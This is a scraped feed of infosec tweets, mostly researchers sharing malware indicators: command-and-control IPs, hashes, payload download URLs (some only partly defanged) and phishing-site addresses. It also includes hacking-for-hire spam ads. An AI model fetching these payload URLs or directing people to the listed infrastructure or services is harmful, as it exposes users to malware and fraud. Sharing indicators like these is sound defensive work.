58_158_177_102: 昼社食らー 午前の健康診断で軽度の脂肪肝といわれました。フォワグラを育てています。。。(すみません、節制します) https://t.co/a1hdGRNwJk -- 58_158_177_102
DrunkBinary: @rejectionking https://t.co/pRdNJH6zZk -- DrunkBinary
pmelson: But where’s the Husqvarna Cut &amp; Break? 🥺 https://t.co/T1DkXf9gKp -- pmelson
DrunkBinary: @UK_Daniel_Card I got a response on LinkedIn as well... https://t.co/1vWn6ZTavR -- DrunkBinary
DrunkBinary: @UK_Daniel_Card https://t.co/4tDbL6CeJU https://t.co/xcVbVklnfK -- DrunkBinary
malware_traffic: #CobaltStrike server at 104.237.219[.]36:8888 is still alive. The domain ciruvowuto[.]com no longer resolves, but the server is still active on the same IP. According to the certificate, looks like it was set up on 2023-01-18. I submitted -- malware_traffic
malware_traffic: @Unit42_Intel #pcap of the infection traffic and the associated malware/artfiacts are now avialable at: https://t.co/wtiRztrA7z https://t.co/Xlvg1AuxsB -- malware_traffic
424f424f: @nop5L3D @NORML When you're right, you're right. -- 424f424f
424f424f: @1ntrcpt https://t.co/O4goXrSCJO -- 424f424f
cyb3rops: I guess I have found my new arch-enemy -- cyb3rops
cyb3rops: Who wrote that? https://t.co/SwAdDFOThP -- cyb3rops
inj3ct0r: @Hakin9 https://t.co/orvKo6JaBA -- inj3ct0r
KorbenD_Intel: @GeorgeGammon @heresyfinancial https://t.co/QLB69o52EY -- KorbenD_Intel
malwrhunterteam: "KADAVRO" ransomware: b30ef4dbcc89cd4bf0da3e7787f43e42023ddc2b5f0bb4f24937538e10e17533 Just some skidware... https://t.co/lL4lpoXJiC -- malwrhunterteam
malwrhunterteam: "projects in Libya\.zip": 00d88009fa50bfab849593291cce20f8b2f2e2cf2428d9728e06c69fced55ed5 "Pipelines Profile (Elfeel- Sharara-Mellitah + Wafa - Mellitah).lnk": 6753933cd54e4eba497c48d63c7418a8946b4b6c44170105d489d29f1fe11494 🤔 @ShadowCha -- malwrhunterteam
malwrhunterteam: @ShadowChasing1 @h2jazi "front.jpg.lnk": aaf80d109bb305d71ecd1cac297eb68780a6abb631c9570a7f751e8df909942f Next stage: https://pastebin[.]com/raw/CY4PXA9P Next stage was on login.securewares[.]site - already down... https://t.co/KhBJrYiNGQ -- malwrhunterteam
lazyactivist192: Resulting payload is still #Redline and #Gozi. -- lazyactivist192
lazyactivist192: Been calling this campaign #FakeBat , since it mimics BatLoader but there is no .BAT file. Saw some interesting campaigns today, looks like they're using Furmark and CPUZ as additional lures today IOCS: https://t.co/qIJkQw8EAu @JRoose -- lazyactivist192
Arkbird_SOLG: Yep, it's clearly based on the leaks (by the way the proposed a Yara rule is based on Conti and not for lockbit green), I have shared some YARA rules for both versions of the green variant of lockbit: x86 - https://t.co/KNVQPTnk8L x64 - http -- Arkbird_SOLG
inj3ct0r: @lainchxn @ExploitDB @ExploitHub they are dead 🤣 -- inj3ct0r
inj3ct0r: #0day Vip-users https://t.co/p9e4mQUwFE , why doesn't work @exploitdb? We will be report, how we fucked server ;) Do you remember the story about @ExploitHub? https://t.co/VSSOluBb0I -- inj3ct0r
inj3ct0r: #0day #ControlWebPanel Unauthenticated Remote Command Execution #Exploit #RCE https://t.co/Z306ScCn6y -- inj3ct0r
James_inthe_box: @idclickthat @1ZRR4H @JAMESWT_MHT @malwrhunterteam @th3_protoCOL Couple more of these, sadly still flagged as #unknown https://t.co/DMi6N1LGAW https://t.co/8Frwcv0X1O https://t.co/hZLRCpnbCE -- James_inthe_box
James_inthe_box: From earlier today: #purecrypter https://t.co/5p7Q1hlatn 👀 https://t.co/5iruJ0hFw1 -- James_inthe_box
James_inthe_box: @AnFam17 The real life version looks way better 🤗 -- James_inthe_box
James_inthe_box: @AnFam17 Aye @pr0xylife had seen another that started the infection chain with a .one earlier today: https://t.co/DfWoHgvbzb P.S. love the new avatar :) -- James_inthe_box
James_inthe_box: @noottrak And there you go...danke! -- James_inthe_box
KorbenD_Intel: If a random sampling of vulnerabilities yields 50% at #CVSS 9.8, something tells me 1) the scoring needs rethinking or 2) we are getting less secure https://t.co/EsgqfGKiHQ -- KorbenD_Intel
malware_traffic: @k3dg3 @pr0xylife @James_inthe_box @JRoosen @Kostastsale @0xToxin @osipov_ar @0xhido @0x49736b @phage_nz I also thought about "one smote" which would be more medieval -- malware_traffic
malware_traffic: @k3dg3 @pr0xylife @James_inthe_box @JRoosen @Kostastsale @0xToxin @osipov_ar @0xhido @0x49736b @phage_nz https://t.co/WOl93mBtta -- malware_traffic
malware_traffic: @k3dg3 @pr0xylife @James_inthe_box @JRoosen @Kostastsale @0xToxin @osipov_ar @0xhido @0x49736b @phage_nz https://t.co/CIzMs0oXo0 -- malware_traffic
malwrhunterteam: "Thomas_Gassner_CV_2023.zip": d2193212a0c447a90f34c76eef9d58efb11291a26ab00076021c76d8d8852064 "Thomas_Gassner_CV_2023.pdf.lnk": fa96d202d7d709fa13f5ee0810d03c85ec66b1a842938582de0286da9302194c Next stage (times out currently): http://3.1 -- malwrhunterteam
Max_Mal_: @Unit42_Intel @pr0xylife Thank you @Unit42_Intel team and @malware_traffic for sharing 🔥 #Qakbot new Onenote campaign lead to #CobaltStrike C2 IP: 104.237.219[.]36 Domain: ciruvowuto[.]com - @Namecheap Port 8888 https://t.co/5BdmBxc5XL https -- Max_Mal_
Max_Mal_: Typo 😓 *Masive https://t.co/RTBaJ7EBgi -- Max_Mal_
424f424f: Ugh.. I'm trying to attach my domain to my @Azure tenant. However, my previous account tied to the .onmicrost.com domain is suspended. I can't delete the tenant so, I cannot re-issue that domain. FML https://t.co/5S1ey5go0h -- 424f424f
cyb3rops: 😐🔥 https://t.co/1scwKRYWoa -- cyb3rops
malwrhunterteam: So that not have to repeat 4 times: fuck Google. https://t.co/g9uyQDG7NP -- malwrhunterteam
Max_Mal_: @1ZRR4H https://t.co/47GwMBvg2t -- Max_Mal_
RansomwareNews: Group: vicesociety Approx. Time: 2023-01-31 19:04:43.350904 Title: TechInsights -- RansomwareNews
RansomwareNews: Group: vicesociety Approx. Time: 2023-01-31 19:04:41.814831 Title: Societa Italiana Brevetti SpA -- RansomwareNews
vxunderground: .@SI_FalconTeam illustrated deploying Putty to a machine using an unsigned MSIX file. In this particular example administrative privileges were required Previously Magniber ransomware used this technique using a stolen MSIX certificate. St -- vxunderground
vxunderground: https://t.co/Q380L25Y3I -- vxunderground
vxunderground: P.S. Do not use this "feature" to "distribute" your "application" "widely". -- vxunderground
vxunderground: Windows 11 now lets you create unsigned MSIX packages for "testing". You can install your "legitimate" "application" for "testing" without needing to sign it. Microsoft states this was developed to making "testing" easier More information: -- vxunderground
cyb3rops: After years in security monitoring, detection engineering, training ML models and writing detections, you'll learn one thing: The problem isn't that malware tries to look like legitimate software, it's that software does a lot of things that yo -- cyb3rops
James_inthe_box: @nazywam One more: https://t.co/NF9eylVgVu -- James_inthe_box
JAMESWT_MHT: @signorina37H @FBussoletti @AndreaDraghetti @sonoclaudio @WebMarkeThink @guelfoweb @reecdeep @illegalFawn Tranquilla te la faccio senza zucchero Ti allego una foto? Non la vedi? Be è senza zucchero 😝😂 -- JAMESWT_MHT
Manu_De_Lucia: #APT #Callisto #Russia #Ukraine #War likely early Dec. 2022 #CredentialTheft campaign against #SpetsTechnoExport (STE) | AS44477 (Stark Industries) | kiev-ste\.com | ste-kiev\.com -- Manu_De_Lucia
Max_Mal_: Missive #Qakbot Spamming Onenote (.one) VT detections 0/60❗️ https://t.co/TyBGxvzDKa Pattern: ApplicationReject_[0-9]{5,}(Jan31).one https://t.co/AL9TEbpphK https://t.co/jLbbDs6xGb -- Max_Mal_
TalosSecurity: Attending #CiscoLiveEMEA? Join Talos' @mlee_security for a networking coffee break Tuesday February 7th https://t.co/zrL7FdCUpe https://t.co/cwEA1Te2cF -- TalosSecurity
424f424f: REKT. I mean, you'd totally think this was Zoom right? hee hee https://t.co/WyW7LxMoFH -- 424f424f
ankit_anubhav: @Max_Mal_ Can you please upload the one note file to bazaar -- ankit_anubhav
cyber__sloth: The #LNK filename : Запит Служба безпеки України 12-1-125 від 09.01.2023 року (Управління соціального захисту населення).pdf.lnk Request of the Security Service of Ukraine 12-1-125 dated January 9, 2023 (Department of Social Protection of t -- cyber__sloth
cyber__sloth: #APT #gamaredon sample that connects to the domain, 2025daf09b4d2e5ce25888d6ebd26e01 File Name : 12-1-125_09.01.2023.rar (contains a #LNK file) https://t.co/Uy0YmFlt3x -- cyber__sloth
ItsReallyNick: @pmelson iv stands for ignore variable -- ItsReallyNick
KorbenD_Intel: # Jesus Christ is Alive! 2 Peter 3:9-10 The Lord is not slow to fulfill his promise as some count slowness, but is patient toward you, not wishing that any should perish, but that all should reach repentance. -- KorbenD_Intel
pmelson: I've come to the conclusion that it's easier to reverse engineer heavily protected malware written by a smart person than it is to reverse engineer poorly protected malware written by someone with a room temperature IQ. 🤦🤣 https://t.co/2KexYNodsy -- pmelson
abuse_ch: Malvertising on Google Search spreading MetaStealer trojan 📣 🔥gimptop .life @namesilo 🔥tor-brows .store @Namecheap MetaStealer botnet C2: uiouaqcqqcgueweg .xyz @Namecheap Payload hosted on Dropbox: 🌐 https://t.co/tlexKP7rWO Payload: 📄 h -- abuse_ch
abuse_ch: @D3LabIT @JAMESWT_MHT @AgidCert @reecdeep Thanks! Pushed to URLhaus ⬇️ https://t.co/7euJ0htKFc -- abuse_ch
cyb3rops: Security Advisory: Remote Command Execution in binwalk #RCE #BinWalk https://t.co/exdXnIa2G5 -- cyb3rops
James_inthe_box: Hrmm...don't recall #agenttesla using webhooks on discord before.. https://t.co/hIhgn4Gb6h -- James_inthe_box
malwrhunterteam: https://wbservicecenter.weebly[.]com/ "E-MAIL AÐÐRESS" "PASSW0RÐ" "C0NFIRM PASSW0RÐ" 😂 https://t.co/sWWAbXJMxr -- malwrhunterteam
Max_Mal_: @Artilllerie https://t.co/DAPWWumlCv -- Max_Mal_
Max_Mal_: @D3LabIT @reecdeep @JAMESWT_MHT @AgidCert #Qakbot on 🔥 pushing hard malsapm with Onenote https://t.co/QqND7wZ3B5 -- Max_Mal_
Max_Mal_: @ankit_anubhav Thank you @pr0xylife 💪 https://t.co/xCxfZXNYNu -- Max_Mal_
pmelson: @schwartzonsec I mean, they went for it. They're passing the same "IV" into oblivion over and over. https://t.co/Bc0q8A4xYS -- pmelson
IntezerLabs: Join us in TWO HOURs to see how SOC managers can automate triage and investigation for all new alerts to their team. We'll show examples using @SentinelOne and Intezer scale up your security operations with automation for incident response a -- IntezerLabs
kyleehmke: Series of suspicious domains registered through Njalla on 1/30 and hosted on ASNs 44592 or 43160: pl-nl-tun[.]in pl-es-tun[.]in it-nl-tun2[.]in it-nl-tra2[.]in it-nl-tra1[.]in it-es-tun3[.]in de-nl-tun2[.]in de-nl-tun1[.]in de-nl-tra2[.]in de-n -- kyleehmke
malwrhunterteam: @adm1n_usa32 https://setupyourkey[.]xyz/ - @Namecheap registered... -- malwrhunterteam
Max_Mal_: #Qakbot Distro URL: myvigyan[.]com https://t.co/d5cYPeQwJD https://t.co/6SCLgbCIIW -- Max_Mal_
Max_Mal_: #Qakbot Switched to Onenote New Campaign 🚨 Exec Flow #DFIR &amp; TTPs: Malsapm &gt; URL &gt; Onenote &gt; HTA &gt; CURL &gt; Rundll32 [+] New loader internal name: comrepl.dll 🔥 [+] Export func: ,Wind [+] Curl drop the loader to ProgramData di -- Max_Mal_
TheDFIRReport: Red teamers this one is for you! Do you use ShareFinder on your engagements? Why or why not? Discuss below -- TheDFIRReport
virusbtn: Trend Micro researchers present Magniber in their latest "Ransomware Spotlight". Malicious attackers continue to use the Magniber ransomware to compromise organizations despite it having first been detected as long ago as 2017. https://t.co/wFRt -- virusbtn
virusbtn: SentinelOne's @philofishal highlights some of the popular and emerging mechanisms used by threat actors to achieve initial compromise on a macOS system, such as hidden and obfuscated scripts, Go implants &amp; obfuscated Cobalt Strike beacons. h -- virusbtn
virusbtn: Check Point's @Arie_10101 looks into the TrickGate shellcode-based packer offered as a service to hide malware. TrickGate has been used in the last 6 years to deploy Cerber, Trickbot, Maze, Emotet, REvil, Cobalt Strike, AZORult, Formbook, AgentT -- virusbtn
virusbtn: AhnLab researchers analyse the Dalbit (Moonlight) threat actor's latest campaign in South Korea. https://t.co/qLBHX1D9Mz https://t.co/T6vzauX2wv -- virusbtn
vxunderground: @Dog_Knight YouTube: https://t.co/iPGfPngQEw -- vxunderground
vxunderground: @vxsh4d0w @realhackhistory https://t.co/xxmM7r5pUA -- vxunderground
vxunderground: @Securelist "The most advanced Piece of Shit threat we have seen so far" -- vxunderground
vxunderground: @realhackhistory (or piss off NATO: Ukrainian authorities received a tip from United States intelligence and United Kingdom intelligence regarding the couple). -- vxunderground
vxunderground: January 13th the Ukrainian authorities arrested a 36 year old man and his wife. The couple were leaders of a small ransomware group operating out of Kyiv. Families who ransom together, stay together🥰 Information via @realhackhistory More -- vxunderground
424f424f: @HackingLZ @BushidoToken Said every hacker ever.. -- 424f424f
424f424f: Yes! Browsing in the terminal is back baby! https://t.co/ay5ILZdf4U -- 424f424f
JAMESWT_MHT: #Ursnif #Gozi #Agenziaentrate 31_01_2023 Samples Collection updated 👇👇👇 https://t.co/kADezqouc8 https://t.co/QCAzlOiB6p https://t.co/CAJdLB5uRO -- JAMESWT_MHT
JAMESWT_MHT: @ULTRAFRAUD @videolan @namesilo @idclickthat @1ZRR4H @malwrhunterteam @ViriBack @Cryptolaemus1 @0xToxin Payload 300MB from URL https://cdn.discordapp.]com/attachments/1065649625794617355/1069383093443641415/Setup.exe &gt; https://t.co/g0m6RzU -- JAMESWT_MHT
JAMESWT_MHT: Second Stage #ursnif #gozi DLL Botnet 5050 build 250255 sample thanks to @reecdeep 🔆https://t.co/nnw6Byr9qy C2 91.215.85.193 https://t.co/Dk0gWuvN7N -- JAMESWT_MHT
JCyberSec_: @Liron_Segev Great video. Basic clear advice. If you ever want to chat SMS phishing let me know! I can help you out with samples and exploring phishing kits used by threat actors🥷 -- JCyberSec_
reecdeep: 🔥exfiltration: 91.215.85.194 146.70.113.161 lookingerty[.com 23.227.202.77 https://t.co/gF8i5Md7az -- reecdeep
vxunderground: @vxsh4d0w @realhackhistory 1. Russia does not actively cooperate with NATO, especially now. 2. Ransomware affiliates have been arrested all across the globe - most recently 1 in Canada and 1 in the United States -- vxunderground
58_158_177_102: ベンダーサイドの方でユーザサイドでセキュリティの仕事をすることに興味がある人や、ユーザサイドに行きたいけれど今後どういったスキルを伸ばしたらいいのか話したい人が、ICIの中の人とオンラインで話してみたい、と思った時の申請フォームを作りました #中の人 https://t.co/EoBwYxEu6z -- 58_158_177_102
58_158_177_102: 昼社食そば いろいろやらなきゃ https://t.co/Cowz7eA3xC -- 58_158_177_102
JCyberSec_: @psychonerd3 Nope just an image sent as a MMS. If you click it then it'll open a larger image preview. There's no way in SMS to sent hyperlinked images. You can't render HTML or other code in SMS as far as I'm aware. -- JCyberSec_
reecdeep: #Gozi #Malware #ISFB targets #Italy 🇮🇹 using highly evasive loader to inject real second stage. thanks to @JAMESWT_MHT https://t.co/FEaWMDSsy0 loader spawns shellcode to drop second stage: https://t.co/wjf6SmmrQs 🔥c2: 91.215.85.193 https:// -- reecdeep
SBousseaden: @joevest Congratulations 👏 -- SBousseaden
anyrun_app: Overview of the notorious #SystemBC malware From its origins as a RAT to its use in parallel ransomware campaigns, find out all the details 🔎🖥️ Check a new post to download samples and IOCs 🔗 https://t.co/EjsIxjZEp5 #cybersecurity #malwar -- anyrun_app
JAMESWT_MHT: @reecdeep @James_inthe_box @guelfoweb @pr0xylife @FBussoletti @Max_Mal_ @Myrtus0x0 @malwrhunterteam @VirITeXplorer @MalwarePatrol Mentioned #Gozi #Malware #ISFB Sample https://t.co/nnw6Byr9qy -- JAMESWT_MHT
JAMESWT_MHT: cc @58_158_177_102 @felixw3000 @fumik0_ -- JAMESWT_MHT
JAMESWT_MHT: Spam Email @Agenzia_Entrate DLL URL https://doplertool.]com/ Samples https://t.co/kADezqouc8 https://t.co/fkBstT1w5d -- JAMESWT_MHT
cyb3rops: Yay! https://t.co/U9xvHIwmAC https://t.co/YymQaD2Oqk -- cyb3rops
cyb3rops: @zdh27 @ulfposh Mit einem solchen Rat und 70%+ Zustimmungsquote in der Bevölkerung würden dann auch unsere Kernkraftwerke weiter betrieben -- cyb3rops
DissectMalware: @Hellfire0x01 Strange, my DM is open indeed -- DissectMalware
JAMESWT_MHT: @NetSupportGroup allenew1.[com:2552 allenew2.[com:2552 alle13net1.[com:5511 alle13net2.[com:5511 https://t.co/gTZfvdOAQu -- JAMESWT_MHT
JAMESWT_MHT: @1ZRR4H @Ax_Sharma @StopMalvertisin @AnFam17 @0xToxin @pr0xylife @malwrhunterteam #NetSupport RAT nesup. zip &gt; client32.ini is 3 months old https://t.co/bptCxtLIfO nesup2. zip &gt; client32.ini new https://t.co/cypqfxJbtg https://t.co/cxv -- JAMESWT_MHT
JAMESWT_MHT: @idclickthat @YouTube @Namecheap @discord @ULTRAFRAUD @malwrhunterteam @1ZRR4H @0xDanielLopez Mentioned sample #loader &gt; #raccoon #stealer https://t.co/kIWb03T6NT drop &gt; #LaplasClipper https://t.co/hktvdtI4ob IoCs 45.15.156[.225/ 104.19 -- JAMESWT_MHT
malwrhunterteam: Citrix is just one of the many companies that should. But unfortunately Google seems to be "the god", they can do anything while basically no one dares to even mention it. How many company you seen doing tweets like this from OBS? This wo -- malwrhunterteam
nullcookies: @netstorm_ Really well designed piece -- nullcookies
DrunkBinary: What cocaine looks like in human form... https://t.co/IdP1iIHgQP -- DrunkBinary
lazyactivist192: @Judith_Kirby @941DR @ComradeOhio @beaconjournal https://t.co/dFKLLYdpku -- lazyactivist192
lazyactivist192: @Judith_Kirby @941DR @ComradeOhio @beaconjournal There are like 4 along Copley road. There's 145 around the city. They're all up, we made a map, but also got a map from the city in a FOIA request. -- lazyactivist192
vxunderground: @Ox4d5a @dccybersec https://t.co/1f0iFtfm15 -- vxunderground
snovvcrash: @_bin_Ash And mv also!😅 -- snovvcrash
snovvcrash: @rotarydrone Indeed, it can be tricky sometimes. Used this wallpaper to make a single photo actually. I usually prefer a darker background 🌚 https://t.co/1P2O9A2pBq -- snovvcrash
_AnonymousHack6: For all device unlock,hack,spy tracking of lost phone,bypassing and upgrade.inbox me or contact me on WhatsApp:+1 (… https://t.co/M29OIJvvy7 -- _AnonymousHack6
AtomSpam: Detected #phishing clone at address: hxxp://virkunarzr[.]gq/updation%202/ #microsoft #infosec #cybersecurity… https://t.co/2wMhamy8F9 -- AtomSpam
AtomSpam: Detected #phishing clone at address: hxxps://luigiandaj[.]com/aggreementfzx/ #microsoft #infosec #cybersecurity… https://t.co/J6hk0WTKJn -- AtomSpam
AtomSpam: Detected #phishing clone at address: hxxps://s3[.]amazonaws[.]com/appforest_uf/f1675242488340x725557457169749900/in… https://t.co/NOCyOCbB3n -- AtomSpam
AtomSpam: Detected #phishing clone at address: hxxp://www[.]seracevre[.]com/scc/ #microsoft #infosec #cybersecurity… https://t.co/Sr5rIAt1Cs -- AtomSpam
beefyspace: RT @AtomSpam: Detected #phishing clone at address: hxxps://s3[.]amazonaws[.]com/appforest_uf/f1675242488340x725557457169749900/index%20(17)… -- beefyspace
beefyspace: RT @AtomSpam: Detected #phishing clone at address: hxxp://www[.]seracevre[.]com/scc/ #microsoft #infosec #cybersecurity #atomspam Follow… -- beefyspace
bharath_vss: RT @0xPrial: I earned $2,000 for Subdomain takeover report on @Hacker0x01 ❤️ Tips: Always look for CNAME records with NXDOMAIN status 😉 #Bu… -- bharath_vss
cocomelonckz: https://t.co/K6Rh3BYakn next one on my blog. #cybersecurity #infosec #informationsecurity #malware #malwaredev… https://t.co/RqB7HNgOWB -- cocomelonckz
council_cyber: RT @three_cube: Tracking the Target Through Cyberspace! OSINT: Finding the Same Username across Multiple Platforms #osint #osint4hackers #… -- council_cyber
Cyberiumsol: RT @Cyberiumsol: In a new report by Kaspersky, hacking groups and APT groups seek to hire mainly software developers (61% of all ads), offe… -- Cyberiumsol
CyberSecurityN8: RT @programmerjoke9: Twitter API request prices commensurate to a Cyber Truck. Fact or fiction?#100Daysofcode #javascript #programming #dev… -- CyberSecurityN8
CyberSecurityN8: RT @Dheerajydv19: Every tool has its own features and drawbacks, so no hate for any tool, WhatsMyName also has its own features, so try tha… -- CyberSecurityN8
CyberSecurityN8: RT @AtomSpam: Detected #phishing clone at address: hxxps://luigiandaj[.]com/aggreementfzx/ #microsoft #infosec #cybersecurity #atomspam… -- CyberSecurityN8
CyberSecurityN8: RT @DaveTech_best: Your professional hacker handles everyone's reported issues Do you have a dedicated hacking job? DM and request my ser… -- CyberSecurityN8
CyberSecurityN8: RT @bugbounty0: ChatGPT — Bug Bounty Recon Automation #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/uHzEmlBUjA -- CyberSecurityN8
CyberSecurityN8: RT @viehgroup: When a system has a port open, it is said to be ______ for a port #infosec #informationsecurity #cybersecurity #cybersec #c… -- CyberSecurityN8
CyberSecurityN8: RT @_AnonymousHack6: For all device unlock,hack,spy tracking of lost phone,bypassing and upgrade.inbox me or contact me on WhatsApp:+1 (904… -- CyberSecurityN8
DaveTech_best: Your professional hacker handles everyone's reported issues Do you have a dedicated hacking job? DM and request m… https://t.co/9jramkYAIv -- DaveTech_best
DaveTech_best: Hacking is much easier when you connect with the right hacker. Get all your hacking services in an instant inbox… https://t.co/Q3NA2UnECt -- DaveTech_best
decillionairs: RT @three_cube: Tracking the Target Through Cyberspace! OSINT: Finding the Same Username across Multiple Platforms #osint #osint4hackers #… -- decillionairs
dxsherpa: ServiceNow’s environment includes third-party #security information and event management (SIEM), endpoint security… https://t.co/8KuLEF02C4 -- dxsherpa
grave1x: RT @cyb_detective: CCTV cameras in #OSINT - how to search for cameras (including vulnerable cameras) - how to save streams from cameras -… -- grave1x
hello4n6: RT @OSINT_Tactical: Many Twitter OSINT tools are going to break very soon. #OSINT -- hello4n6
JanetNamba: RT @KenXieFortinet: My thoughts in @wef Agenda: With society's increased reliance on technology, the need for #cybersecurity has never been… -- JanetNamba
JEMPradio: Phish - Halley's Comet&gt;Ocelot (10-31-18) #Phish #JEMPRadio #CommunityRadio #NowPlaying https://t.co/Bz9yNRAZtE -- JEMPradio
John_A_Ridge: RT @osint_east: It would appear another test of the collective #OSINT effort has come across. #NAFO : do your thing. Conditions: video o… -- John_A_Ridge
K0to4m4tsukami: RT @bugbounty0: ChatGPT — Bug Bounty Recon Automation #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/uHzEmlBUjA -- K0to4m4tsukami
KarimKaream: RT @ITSecurityguard: Do you want to create a wordlist for yourself? Not sure where to start? Not sure what others are doing? Go to any pub… -- KarimKaream
kfrancoexpert: RT @programmerjoke9: Twitter API request prices commensurate to a Cyber Truck. Fact or fiction?#100Daysofcode #javascript #programming #dev… -- kfrancoexpert
maxw3st: RT @osint_east: It would appear another test of the collective #OSINT effort has come across. #NAFO : do your thing. Conditions: video o… -- maxw3st
nifsec99: RT @three_cube: Tracking the Target Through Cyberspace! OSINT: Finding the Same Username across Multiple Platforms #osint #osint4hackers #… -- nifsec99
osint_east: It would appear another test of the collective #OSINT effort has come across. #NAFO : do your thing. Conditions:… https://t.co/DSj8UDgKq8 -- osint_east
PythonBot_By_PM: RT @programmerjoke9: Twitter API request prices commensurate to a Cyber Truck. Fact or fiction?#100Daysofcode #javascript #programming #dev… -- PythonBot_By_PM
rahul05ranjan: RT @cocomelonckz: https://t.co/K6Rh3BYakn next one on my blog. #cybersecurity #infosec #informationsecurity #malware #malwaredev #malwarean… -- rahul05ranjan
sappi_13: RT @0xnirob: Earned More than $10000 in bounties, successfully hacked 11 company. want to learn more about 'Dependency Confusion' attack? T… -- sappi_13
sectest9: RT @DaveTech_best: Your professional hacker handles everyone's reported issues Do you have a dedicated hacking job? DM and request my ser… -- sectest9
sectest9: RT @ITSecurityguard: Do you want to create a wordlist for yourself? Not sure where to start? Not sure what others are doing? Go to any pub… -- sectest9
sectest9: RT @Dheerajydv19: Every tool has its own features and drawbacks, so no hate for any tool, WhatsMyName also has its own features, so try tha… -- sectest9
sectest9: RT @viehgroup: When a system has a port open, it is said to be ______ for a port #infosec #informationsecurity #cybersecurity #cybersec #c… -- sectest9
sectest9: RT @KenXieFortinet: My thoughts in @wef Agenda: With society's increased reliance on technology, the need for #cybersecurity has never been… -- sectest9
seniinthebox: RT @aselawaid: #CyberSecurityLK 🧵 An increased trend of #IG based #phishing in #SriLanka by fake accounts impersonating known/famous acc,… -- seniinthebox
SnoopyFrenz: RT @RESecurity: Resecurity® has identified a relatively new #ransomware family called “Nevada Ransomware”. On February 1st, the operators b… -- SnoopyFrenz
sukritghosh: From #RRR ➡️ #DRRR (DSCI Ransomware Rapid Responder)... Another blockbuster in the making with the support of #YOU… https://t.co/lx179zv7dv -- sukritghosh
viehgroup: When a system has a port open, it is said to be ______ for a port #infosec #informationsecurity #cybersecurity… https://t.co/aYU9dzFuQI -- viehgroup
Vignesh_Paraman: RT @RootxRavi: Just scored a 4 Digit Bounty on @YogoshaOfficial 1 : Get all the URL from wayback / Gau 2 : Filter out the js file using… -- Vignesh_Paraman
CyberSecurityN8: RT @cocomelonckz: https://t.co/K6Rh3BYakn next one on my blog. #cybersecurity #infosec #informationsecurity #malware #malwaredev #malwarean… -- CyberSecurityN8
ecarlesi: Threat on hxxp://8a[.]boats/ #malware #dynadot -- ecarlesi
jpcert_ac: JPCERT/CCの対応したセキュリティインシデントの統計情報(2004年から)をGitHubで公開しました。 https://t.co/6nd9lMvMaM -- jpcert_ac
sectest9: RT @IncruxTech: The looming threat of ransomware (Infographic). #Infosec #CyberSecurity #CyberAttack #Hacking #Privacy #Threat #Malware #R… -- sectest9
sectest9: RT @db_digest: ION: Irish Financial Trading Software Provider's "LockBit" Ransomware Attack Impacts Global Financial Derivatives Trading ht… -- sectest9
sectest9: RT @cocomelonckz: https://t.co/K6Rh3BYakn next one on my blog. #cybersecurity #infosec #informationsecurity #malware #malwaredev #malwarean… -- sectest9
SturgillRandy: RT @IncruxTech: The looming threat of ransomware (Infographic). #Infosec #CyberSecurity #CyberAttack #Hacking #Privacy #Threat #Malware #R… -- SturgillRandy
Tivilletweets: RT @db_digest: ION: Irish Financial Trading Software Provider's "LockBit" Ransomware Attack Impacts Global Financial Derivatives Trading ht… -- Tivilletweets
ToniLar57503444: #Malware Experts Uncover the Identity of Mastermind Behind Golden Chickens Malware Service https://t.co/zxIcRSYRPd -- ToniLar57503444
WaterISAC: In Today's Security &amp; Resilience Update: Ransomware Resilience Tip, Supply Chain Vendors with Data Breaches, Security-Focused Importance from @DarkReading , and more. Full bulletin - https://t.co/OX6WpVmbGQ #water #wastewater #cybersecuri -- WaterISAC
WaterISAC: @InfoSecSherpa And protect we shall! 💦 -- WaterISAC
beefyspace: RT @scanta_io: #Leaders can make better decisions for the employees if they better analysing culture, technology and physical space. #TruP… -- beefyspace
021System: Memes of today #infosec #cybersecurity #cybersecuritytips #pentesting #hacker #informationsecurity #news #berita… https://t.co/srsWkjkaWS -- 021System
ARealHumanName1: RT @programmerjoke9: Twitter API request prices commensurate to a Cyber Truck. Fact or fiction?#100Daysofcode #javascript #programming #dev… -- ARealHumanName1
AtomSpam: Detected #phishing clone at address: hxxps://metamaskz[.]cc/ #metamask #crypto #infosec #cybersecurity #atomspam… https://t.co/hYERiBFf2o -- AtomSpam
beefyspace: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://digitalbrick[.]com[.]cn/ IP: 155.94… -- beefyspace
beefyspace: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://nftshopping[.]com[.]cn/ IP: 155.94.… -- beefyspace
beefyspace: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://exsplor[.]com/ IP: 155.94.149.224 B… -- beefyspace
beefyspace: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://www-smbc-card-com[.]es-xj[.]com/ IP… -- beefyspace
beefyspace: RT @021System: Memes of today #infosec #cybersecurity #cybersecuritytips #pentesting #hacker #informationsecurity #news #berita #technolog… -- beefyspace
BRANDONAGE: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- BRANDONAGE
CyberSecurityN8: RT @Hanishhsharma: What is happening in today’s world these worthless thieves. #cybercrime #theft #fake #otp #Finance https://t.co/cCMNCgJD… -- CyberSecurityN8
CyberSecurityN8: RT @Holger_in_MT: See how to identify current global trends in #cybercrime and learn how to defend against future attacks with @MicroFocusS… -- CyberSecurityN8
CyberSecurityN8: RT @hetmehtaa: Awesome Tips And Tricks For IDOR ( $100/Day) 🔥 #Infosec #Idor #Security #Cyber #bugbounty https://t.co/GyYRr7dHuC -- CyberSecurityN8
CyberSecurityN8: RT @Its_D3f4lt: Intro to Defensive Security - I have just completed this room! Check it out: https://t.co/Hq4xGnx3xJ #tryhackme #security #… -- CyberSecurityN8
CyberSecurityN8: RT @021System: Memes of today #infosec #cybersecurity #cybersecuritytips #pentesting #hacker #informationsecurity #news #berita #technolog… -- CyberSecurityN8
CyberSecurityN8: RT @MSM_Marketplace: @KordaMentha has released its cyber security predictions for 2023, Cyber in 2023: Evolving Threats and Resilience. Dow… -- CyberSecurityN8
CyberSecurityN8: RT @kmscom6: What’s in store for #ransomware in 2023? @Kaspersky believes the next #WannaCry is just around the corner (via @securityweek).… -- CyberSecurityN8
ecarlesi: Threat on hxxps://8a[.]boats/ #malware #dynadot -- ecarlesi
